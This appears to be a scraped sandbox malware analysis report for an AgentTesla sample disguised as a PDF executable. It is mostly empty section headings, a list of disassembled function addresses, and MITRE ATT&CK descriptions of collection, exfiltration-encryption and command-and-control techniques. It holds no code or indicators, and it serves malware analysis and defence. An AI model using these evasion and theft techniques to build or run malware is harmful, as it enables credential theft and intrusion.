Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Arrivalnotice2020pdf.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

SMTP Packets

Code Manipulations

Function 000B1970, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108
memoryCOMMON

Function 000B4671, Relevance: 18.1, APIs: 12, Instructions: 109
COMMON

Function 000BF47B, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Function 000BF458, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 000BA5B8, Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Function 000B8FB4, Relevance: .3, Instructions: 345
COMMONCrypto

Function 000B93E9, Relevance: .3, Instructions: 341
COMMONCrypto

Function 000B8B7F, Relevance: .3, Instructions: 331
COMMONCrypto

Function 000B8767, Relevance: .3, Instructions: 323
COMMONCrypto

Function 000B7F50, Relevance: .1, Instructions: 76
COMMONCrypto

Function 000BB7BA, Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Function 000B26AC, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
COMMON

Function 000BE0EB, Relevance: 13.6, APIs: 9, Instructions: 66
COMMON

Function 000B20E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Function 000B10D0, Relevance: 10.6, APIs: 7, Instructions: 50
COMMON

Function 000BAB83, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Function 000B9C05, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Function 000B1040, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Function 000B31C4, Relevance: 7.6, APIs: 5, Instructions: 144
COMMON

Function 000BF5DC, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Function 000B2D71, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142
COMMON

Function 000C2A2B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMON

Function 000B75D3, Relevance: 6.1, APIs: 4, Instructions: 139
COMMON

Function 000C3021, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Function 000B6F1D, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Function 000BF722, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Function 000BC32C, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Function 000B1CD0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135
COMMON

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre